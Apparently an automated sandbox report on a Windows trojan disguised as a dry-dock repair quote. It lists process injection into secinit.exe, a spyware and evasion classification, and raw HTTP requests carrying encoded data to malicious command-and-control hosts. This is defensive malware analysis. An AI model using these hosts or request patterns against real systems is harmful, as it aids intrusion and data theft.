Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016AFB80	3_2_016AFB80
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_01703A6C	3_2_01703A6C
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_01747A46	3_2_01747A46
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_0174FA49	3_2_0174FA49
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_0173DAC6	3_2_0173DAC6
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016D5AA0	3_2_016D5AA0
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_0172DAAC	3_2_0172DAAC
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_01747D73	3_2_01747D73
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_01693D40	3_2_01693D40
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_01741D5A	3_2_01741D5A
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016AFDC0	3_2_016AFDC0
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_01709C32	3_2_01709C32
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_0174FCF2	3_2_0174FCF2
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_0174FF09	3_2_0174FF09
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_01653FD5	3_2_01653FD5
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_01653FD2	3_2_01653FD2
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_0174FFB1	3_2_0174FFB1
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_01691F92	3_2_01691F92
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_01699EB0	3_2_01699EB0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_0377A352	6_2_0377A352
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036AD34C	6_2_036AD34C
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_0377132D	6_2_0377132D
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036CE3F0	6_2_036CE3F0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_037803E6	6_2_037803E6
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_0370739A	6_2_0370739A
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_03760274	6_2_03760274
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_037612ED	6_2_037612ED
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036DB2C0	6_2_036DB2C0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036C52A0	6_2_036C52A0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036F516C	6_2_036F516C
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_0378B16B	6_2_0378B16B
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036AF172	6_2_036AF172
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036B0100	6_2_036B0100
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_0375A118	6_2_0375A118
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_037781CC	6_2_037781CC
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_037801AA	6_2_037801AA
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036CB1B0	6_2_036CB1B0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_0377F0E0	6_2_0377F0E0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_037770E9	6_2_037770E9
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036C70C0	6_2_036C70C0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_0376F0CC	6_2_0376F0CC
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036C0770	6_2_036C0770
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036E4750	6_2_036E4750
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036BC7C0	6_2_036BC7C0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_0377F7B0	6_2_0377F7B0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036DC6E0	6_2_036DC6E0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_037716CC	6_2_037716CC
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_03777571	6_2_03777571
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036C0535	6_2_036C0535
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_0375D5B0	6_2_0375D5B0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_03780591	6_2_03780591
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036B1460	6_2_036B1460
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_03772446	6_2_03772446
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_0377F43F	6_2_0377F43F
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_0376E4F6	6_2_0376E4F6
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_0377FB76	6_2_0377FB76
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_0377AB40	6_2_0377AB40
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036FDBF9	6_2_036FDBF9
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_03776BD7	6_2_03776BD7
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_03689B80	6_2_03689B80
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036DFB80	6_2_036DFB80
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_03733A6C	6_2_03733A6C
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_03777A46	6_2_03777A46
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_0377FA49	6_2_0377FA49
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_0376DAC6	6_2_0376DAC6
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_03705AA0	6_2_03705AA0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_0375DAAC	6_2_0375DAAC
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036BEA80	6_2_036BEA80
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036D6962	6_2_036D6962
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036C9950	6_2_036C9950
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036DB950	6_2_036DB950
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036C29A0	6_2_036C29A0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_0378A9A6	6_2_0378A9A6
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036C2840	6_2_036C2840
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036CA840	6_2_036CA840
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036C38E0	6_2_036C38E0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036EE8F0	6_2_036EE8F0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036A68B8	6_2_036A68B8
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_03734F40	6_2_03734F40
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036E0F30	6_2_036E0F30
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_0377FF09	6_2_0377FF09
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036CCFE0	6_2_036CCFE0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036B2FC8	6_2_036B2FC8
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_03683FD2	6_2_03683FD2
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_03683FD5	6_2_03683FD5
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_0377FFB1	6_2_0377FFB1
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036C1F92	6_2_036C1F92
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036C0E59	6_2_036C0E59
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_0377EE26	6_2_0377EE26
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_0377EEDB	6_2_0377EEDB
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036C9EB0	6_2_036C9EB0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_0377CE93	6_2_0377CE93
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036D2E90	6_2_036D2E90
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_03777D73	6_2_03777D73
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036C3D40	6_2_036C3D40
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_03771D5A	6_2_03771D5A
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036CAD00	6_2_036CAD00
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036BADE0	6_2_036BADE0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036DFDC0	6_2_036DFDC0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036D8DBF	6_2_036D8DBF
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_03739C32	6_2_03739C32
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036C0C00	6_2_036C0C00
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_0377FCF2	6_2_0377FCF2
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036B0CF2	6_2_036B0CF2
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_03760CB5	6_2_03760CB5
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_02EC1E90	6_2_02EC1E90
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_02EBB0F9	6_2_02EBB0F9
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_02EBB0AF	6_2_02EBB0AF
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_02EBB0B0	6_2_02EBB0B0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_02EC36FB	6_2_02EC36FB
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_02EC3700	6_2_02EC3700
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_02EC5500	6_2_02EC5500
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_02EDBB90	6_2_02EDBB90
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_02EBAF60	6_2_02EBAF60
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_02EBCF70	6_2_02EBCF70
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_02EBCD47	6_2_02EBCD47
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_02EBCD50	6_2_02EBCD50
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_0358E2C3	6_2_0358E2C3
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_0358E1A4	6_2_0358E1A4
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_0358D728	6_2_0358D728
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_0358E65C	6_2_0358E65C

Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: String function: 0167B970 appears 275 times
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: String function: 016D7E54 appears 99 times
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: String function: 016FEA12 appears 86 times
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: String function: 0170F290 appears 105 times
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: String function: 016C5130 appears 56 times
Source: C:\Windows\SysWOW64\secinit.exe	Code function: String function: 0372EA12 appears 84 times
Source: C:\Windows\SysWOW64\secinit.exe	Code function: String function: 0373F290 appears 105 times
Source: C:\Windows\SysWOW64\secinit.exe	Code function: String function: 03707E54 appears 88 times
Source: C:\Windows\SysWOW64\secinit.exe	Code function: String function: 036F5130 appears 36 times
Source: C:\Windows\SysWOW64\secinit.exe	Code function: String function: 036AB970 appears 266 times

Source: QUOTE OF DRY DOCK REPAIR.exe, 00000000.00000002.1455077174.00000000040A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs QUOTE OF DRY DOCK REPAIR.exe
Source: QUOTE OF DRY DOCK REPAIR.exe, 00000000.00000002.1459090404.0000000008010000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs QUOTE OF DRY DOCK REPAIR.exe
Source: QUOTE OF DRY DOCK REPAIR.exe, 00000000.00000002.1455077174.00000000040E8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs QUOTE OF DRY DOCK REPAIR.exe
Source: QUOTE OF DRY DOCK REPAIR.exe, 00000000.00000002.1453189060.00000000012FE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs QUOTE OF DRY DOCK REPAIR.exe
Source: QUOTE OF DRY DOCK REPAIR.exe, 00000000.00000000.1428762467.0000000000D82000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamedoZk.exe> vs QUOTE OF DRY DOCK REPAIR.exe
Source: QUOTE OF DRY DOCK REPAIR.exe, 00000000.00000002.1458422100.0000000007480000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs QUOTE OF DRY DOCK REPAIR.exe
Source: QUOTE OF DRY DOCK REPAIR.exe, 00000003.00000002.1820386053.000000000177D000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs QUOTE OF DRY DOCK REPAIR.exe
Source: QUOTE OF DRY DOCK REPAIR.exe, 00000003.00000002.1820137729.00000000010E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesecinitj% vs QUOTE OF DRY DOCK REPAIR.exe
Source: QUOTE OF DRY DOCK REPAIR.exe	Binary or memory string: OriginalFilenamedoZk.exe> vs QUOTE OF DRY DOCK REPAIR.exe

Source: QUOTE OF DRY DOCK REPAIR.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: QUOTE OF DRY DOCK REPAIR.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.8010000.6.raw.unpack, sCeuj9YajSgfkVDsdu.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.8010000.6.raw.unpack, sCeuj9YajSgfkVDsdu.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.8010000.6.raw.unpack, sCeuj9YajSgfkVDsdu.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.4bc90b8.1.raw.unpack, zltkGPZnD9ZwEclvOo.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.4bc90b8.1.raw.unpack, zltkGPZnD9ZwEclvOo.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.4b3e498.2.raw.unpack, zltkGPZnD9ZwEclvOo.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.4b3e498.2.raw.unpack, zltkGPZnD9ZwEclvOo.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.4bc90b8.1.raw.unpack, sCeuj9YajSgfkVDsdu.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.4bc90b8.1.raw.unpack, sCeuj9YajSgfkVDsdu.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.4bc90b8.1.raw.unpack, sCeuj9YajSgfkVDsdu.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.8010000.6.raw.unpack, zltkGPZnD9ZwEclvOo.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.8010000.6.raw.unpack, zltkGPZnD9ZwEclvOo.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.4b3e498.2.raw.unpack, sCeuj9YajSgfkVDsdu.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.4b3e498.2.raw.unpack, sCeuj9YajSgfkVDsdu.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.4b3e498.2.raw.unpack, sCeuj9YajSgfkVDsdu.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/2@11/8

Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QUOTE OF DRY DOCK REPAIR.exe.log

Source: http://www.corellia.pro/eee1/?v0vHVXch=n9kO9VSsPKocZxga8wMP7ZC/yNhYo/MYHbvIjRRvOevNyFmmshV66n7ll9r5u+VXxmlOglvHHE9+Zbjf/X+X+gqcpnFv5fdVnQSXxkRXfk4Q5CwHoK9c2oYwmaFtGgt8pA==&p6=QbAHL	Avira URL Cloud: Label: malware
Source: http://www.bydotoparca.net/s3u9/?v0vHVXch=UzjCSVSddvdCY8C2KpgECGgzR3gby2SVeHfhkJM3nHWcSpz3gZ2Mu5mgzC51fDOgl0cc0ISzjbohHF66d8TEsPEdOrzND6qrSzk1cnsXMxQ/Woon90MFrB7EZZ9A9paTig==&p6=QbAHL	Avira URL Cloud: Label: malware
Source: http://www.physicsbrain.xyz/i9o2/?p6=QbAHL&v0vHVXch=eeVMOLNT7Wv5dPd1V7fF3d7wbVEZ0Ymjpf1j0+DhWbaaRP3NDl28Px2LHOiznaPSxG5Xa8rlCZjeYW1RU+5lmJ9SS7h7GpbOR0Ih6QylNPIlDDPXgKAPXKjWtP8cuJHPWQ==	Avira URL Cloud: Label: malware

Source: QUOTE OF DRY DOCK REPAIR.exe	Virustotal: Detection: 31%			Perma Link
Source: QUOTE OF DRY DOCK REPAIR.exe	ReversingLabs: Detection: 48%

Source:	Binary string: Microsoft.Build.Utilities.v4.0<>9__1_10<Weave>b__1_10columnHeader10<>9__1_0<Weave>b__1_0<>c__DisplayClass1_0<>9__2_0<.ctor>b__2_0<>9__3_0<WeaveDependencyObjectBaseClass>b__3_0<>9__14_0<GetStaticCtor>b__14_0<>c__DisplayClass4_0<>c__DisplayClass15_0<>c__DisplayClass5_0<>c__DisplayClass6_0<>9__7_0<IsAutoPropertySetter>b__7_0<>c__DisplayClass7_0<>c__DisplayClass18_0<>9__8_0<IsAutoPropertyGetter>b__8_0<GetStaticDependencyPropertyField>b__0<WeaveGetter>b__0<WeaveSetter>b__0<WeaveProperties>b__0<LoadWindows>b__0<WeaveDependencyProperty>b__0Ldarg_0get_<>h__TransparentIdentifier0<Weave>b__11columnHeader11<>9__1_1<Weave>b__1_1<>9__3_1<WeaveDependencyObjectBaseClass>b__3_1<cctor>5__1Ldarg_1IEnumerable`1Collection`1EqualityComparer`1IEnumerator`1List`1Form1WindowsFormsApplication1menuStrip1columnHeader1get_<>h__TransparentIdentifier1get_st1listView1<Weave>b__12columnHeader12Int32<>9__3_2<WeaveDependencyObjectBaseClass>b__3_2<propertyName>5__2<>9__2<Weave>b__2<>f__AnonymousType0`2<>f__AnonymousType1`2<>f__AnonymousType2`2Func`2IGrouping`2KeyValuePair`2Dictionary`2columnHeader2<>h__TransparentIdentifier2columnHeader13<>9__1_3<Weave>b__1_3<type>5__3<Weave>b__3Func`3columnHeader3columnHeader14<>9__1_4<Weave>b__1_4<declaringType>5__4<FindAttachedPropertyFields>d__4columnHeader4<>9__1_5<Weave>b__1_5<e>5__5columnHeader5<>9__1_6<Weave>b__1_6<isReadOnly>5__6columnHeader6<>9__1_7<Weave>b__1_7columnHeader7<Weave>b__8columnHeader8<>9<>9__1_9<Weave>b__1_9columnHeader9<Module>get_AGetWindowLongAget_BDWM_TNP_RECTSOURCEDWM_TNP_VISIBLEWS_VISIBLEGWL_STYLEPSIZESizeFget_GDWM_TNP_RECTDESTINATIONSystem.IOPAPLOPWS_BORDERget_RDWM_THUMBNAIL_PROPERTIESTTARGETWINDOWget_wfIYDWM_TNP_SOURCECLIENTAREAONLYDWM_TNP_OPACITYaMono.Cecil.PdbmscorlibhThumbthumb<>cSystem.Collections.GenericMono.Collections.Genericget_IsStaticlpEnumFuncsrcget_Idget_CurrentManagedThreadId<>l__initialThreadIdProcessThreadLoadAddadd_SelectedIndexChangedcomboBox_SelectedIndexChangedset_FormattingEnabledSynchronized<<>h__TransparentIdentifier0>i__Field<<>h__TransparentIdentifier1>i__Field<method>i__Field<module>i__Field<type>i__Field<p>i__Field<TypePatternMatch>k__BackingField<AttributePatternMatch>k__BackingField<Definition>k__BackingField<HasChanges>k__BackingField<Files>k__BackingField<Assembly>k__BackingFieldAttachedPropertyFieldGetStaticDependencyPropertyFieldfieldLdsfldStsfldhWndget_OperandhwndAddGetterMethodAddSetterMethodImportObjectEqualsMethodget_GetMethodget_SetMethodImportMethodget_methodTracedefaultInstanceFieldReferenceMethodReferenceTypeReferenceMemberReferencePropertyReferencereferencercSourcesourceGetHashCodeget_OpCodeset_AutoScaleModenodeImageget_MessageLogMessagemessageAddRangeEndInvokeBeginInvokeImportPropertyChangedEventHandlerInvokeIEnumerableIDisposablefVisibleDWMHandleget_HandleoldHandleRuntimeTypeHandleGetTypeFromHandleget_MainWindowHandleSingleOpenFileWinFormsSampleget_MainWindowTitleget_Moduleget_MainModuleProcessModuleget_moduleget_Nameset_Nameget_FileNameget_MachineNameget_FullNamepropNamege
Source:	Binary string: Mono.Cecil.Pdb source: QUOTE OF DRY DOCK REPAIR.exe
Source:	Binary string: secinit.pdbGCTL source: QUOTE OF DRY DOCK REPAIR.exe, 00000003.00000002.1820137729.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, fVnaqDZrZDB.exe, 00000005.00000002.3895204334.0000000000FEE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: QUOTE OF DRY DOCK REPAIR.exe, 00000003.00000002.1820386053.0000000001650000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 00000006.00000002.3897892996.0000000003680000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 00000006.00000002.3897892996.000000000381E000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 00000006.00000003.1820108528.000000000331F000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 00000006.00000003.1822212311.00000000034CF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: QUOTE OF DRY DOCK REPAIR.exe, QUOTE OF DRY DOCK REPAIR.exe, 00000003.00000002.1820386053.0000000001650000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, secinit.exe, 00000006.00000002.3897892996.0000000003680000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 00000006.00000002.3897892996.000000000381E000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 00000006.00000003.1820108528.000000000331F000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 00000006.00000003.1822212311.00000000034CF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: secinit.pdb source: QUOTE OF DRY DOCK REPAIR.exe, 00000003.00000002.1820137729.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, fVnaqDZrZDB.exe, 00000005.00000002.3895204334.0000000000FEE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: fVnaqDZrZDB.exe, 00000005.00000000.1741718639.00000000003AF000.00000002.00000001.01000000.0000000C.sdmp, fVnaqDZrZDB.exe, 00000009.00000000.1889026569.00000000003AF000.00000002.00000001.01000000.0000000C.sdmp

Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 4x nop then jmp 07830BC6h	0_2_07830397
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 4x nop then jmp 07830BC6h	0_2_07830668
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 4x nop then xor eax, eax	6_2_02EB9EA0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 4x nop then mov ebx, 00000004h	6_2_035804E8

Source:	DNS query: www.physicsbrain.xyz
Source:	DNS query: www.autonomousrich.xyz
Source:	DNS query: www.031234990.xyz

Source: Joe Sandbox View	IP Address: 144.76.229.203 144.76.229.203
Source: Joe Sandbox View	IP Address: 192.64.118.221 192.64.118.221

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /i9o2/?p6=QbAHL&v0vHVXch=eeVMOLNT7Wv5dPd1V7fF3d7wbVEZ0Ymjpf1j0+DhWbaaRP3NDl28Px2LHOiznaPSxG5Xa8rlCZjeYW1RU+5lmJ9SS7h7GpbOR0Ih6QylNPIlDDPXgKAPXKjWtP8cuJHPWQ== HTTP/1.1Host: www.physicsbrain.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)
Source: global traffic	HTTP traffic detected: GET /s3u9/?v0vHVXch=UzjCSVSddvdCY8C2KpgECGgzR3gby2SVeHfhkJM3nHWcSpz3gZ2Mu5mgzC51fDOgl0cc0ISzjbohHF66d8TEsPEdOrzND6qrSzk1cnsXMxQ/Woon90MFrB7EZZ9A9paTig==&p6=QbAHL HTTP/1.1Host: www.bydotoparca.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)
Source: global traffic	HTTP traffic detected: GET /g9qz/?v0vHVXch=J9sRrZ4fqsb/1Q6AIA+8pauKL/kc/YnlctC80LIvBLslcKLdVtpBX2y3nBvKVl1xysCjrJ6Q3kV9G4g20t4jVg6G/hudG0nqqZ6hYWzTP4BH7K0jhDAwFujk6Ut9TYQuCA==&p6=QbAHL HTTP/1.1Host: www.topked.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)
